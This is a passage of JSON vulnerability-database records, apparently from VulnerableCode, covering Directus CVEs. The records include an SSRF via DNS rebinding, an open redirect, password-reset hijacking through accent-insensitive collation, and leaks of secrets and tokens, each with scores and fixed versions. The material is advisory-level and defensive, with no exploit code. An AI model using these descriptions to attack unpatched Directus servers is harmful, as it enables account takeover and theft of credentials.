The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02996","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.02984","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35441"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35441"},{"reference_url":"https://github.com/advisories/GHSA-ph52-67fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ph52-67fq-75wj"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67
fq-75wj","reference_id":"GHSA-ph52-67fq-75wj","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35441","GHSA-ph52-67fq-75wj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bc42-4j4d-tudj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71608?format=json","vulnerability_id":"VCID-bg96-h5bt-xfbb","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus is vulnerable to an open redirect via the redirect query parameter on the /admin/tfa-setup page. When an administrator who has not yet configured Two-Factor Authentication (2FA) visits a crafted URL, they are presented with the legitimate Directus 2FA setup page. After completing the setup process, the application redirects the user to the attacker-controlled URL specified in the redirect parameter without any validation. This vulnerability could be used in phishing attacks targeting Directus administrators, as the initial interaction occurs on a trusted domain. 
This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05352","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05334","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35411"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35411"},{"reference_url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q75c-4gmv-mg9x","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q75c-4gmv-mg9x"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x","reference_id":"GHSA-q75c-4gmv-mg9x","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/"}],"url":"https://github.
com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35411","GHSA-q75c-4gmv-mg9x"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bg96-h5bt-xfbb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/135972?format=json","vulnerability_id":"VCID-bsua-aktm-1qfd","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. 
This issue was fixed in version 9.23.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45895","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.4604","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492","reference_id":"","reference_type":"","scores":[{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-26492"},{"reference_url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff","reference_id":"ff53d3e69a602d05342e15d9bb616884833ddbff","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff"},{"reference_url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"
value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h","reference_id":"GHSA-j3rg-3rgm-537h","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.23.0","reference_id":"v9.23.0","reference_type":"","scores":[{"value":"5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"5.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.23.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32456?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-f3pv-2cf5-3bg8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/393033?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerabi
lity":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-26492","GHSA-j3rg-3rgm-537h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bsua-aktm-1qfd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/72964?format=json","vulnerability_id":"VCID-d8vm-nuff-uffc",
"summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.0975","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.098","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39943"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39943"},{"reference_url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://github.com/directus/direct
us/security/advisories/GHSA-mvv8-v4jj-g47j","reference_id":"GHSA-mvv8-v4jj-g47j","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"v11.17.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39943","GHSA-mvv8-v4jj-g47j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d8vm-nuff-uffc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/166999?format=json","vulnerability_id":"VCID-eb1b-zvas-muey","summary":"Directus is a free and open-source data platform for headless content management. The Directus process can be aborted by having an authorized user update the `filename_disk` value to a folder and accessing that file through the `/assets` endpoint. 
This vulnerability has been patched and release v9.15.0 contains the fix. Users are advised to upgrade. Users unable to upgrade may prevent this problem by making sure no (untrusted) non-admin users have permissions to update the `filename_disk` field on `directus_files`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031","reference_id":"","reference_type":"","scores":[{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.49626","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0026","scoring_system":"epss","scoring_elements":"0.49762","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-36031"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031","reference_id":"CVE-2022-36031","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-36031"},{"reference_url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77qm-wvqq-fg79"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79","reference_id":"GHSA-77qm-wvqq-fg79","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr"
,"scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:45:00Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-77qm-wvqq-fg79"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/26040?format=json","purl":"pkg:npm/directus@9.15.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-b
ubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.15.0"}],"aliases":["CVE-2022-36031","GHSA-77qm-wvqq-fg79"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eb1b-zvas-muey"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55903?format=json","vulnerability_id":"VCID-eyv5-91cq-pyf9","summary":"Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons (for example the utf8mb4_0900_ai_ci collation), so the attacker's address matches the victim's in the email lookup. 
This vulnerability is fixed in version 10.8.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295","reference_id":"","reference_type":"","scores":[{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.7008","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00604","scoring_system":"epss","scoring_elements":"0.7017","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27295"},{"reference_url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919"},{"reference_url":"https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.monolune.com/articles/what-i
s-the-utf8mb4_0900_ai_ci-collation"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295","reference_id":"CVE-2024-27295","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27295"},{"reference_url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qw9g-7549-7wg5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5","reference_id":"GHSA-qw9g-7549-7wg5","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29477?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vul
nerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27295","GHSA-qw9g-7549-7wg5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eyv5-91cq-pyf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71620?format=json","vulnerability_id":"VCID-ga3s-595f-2keq","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. 
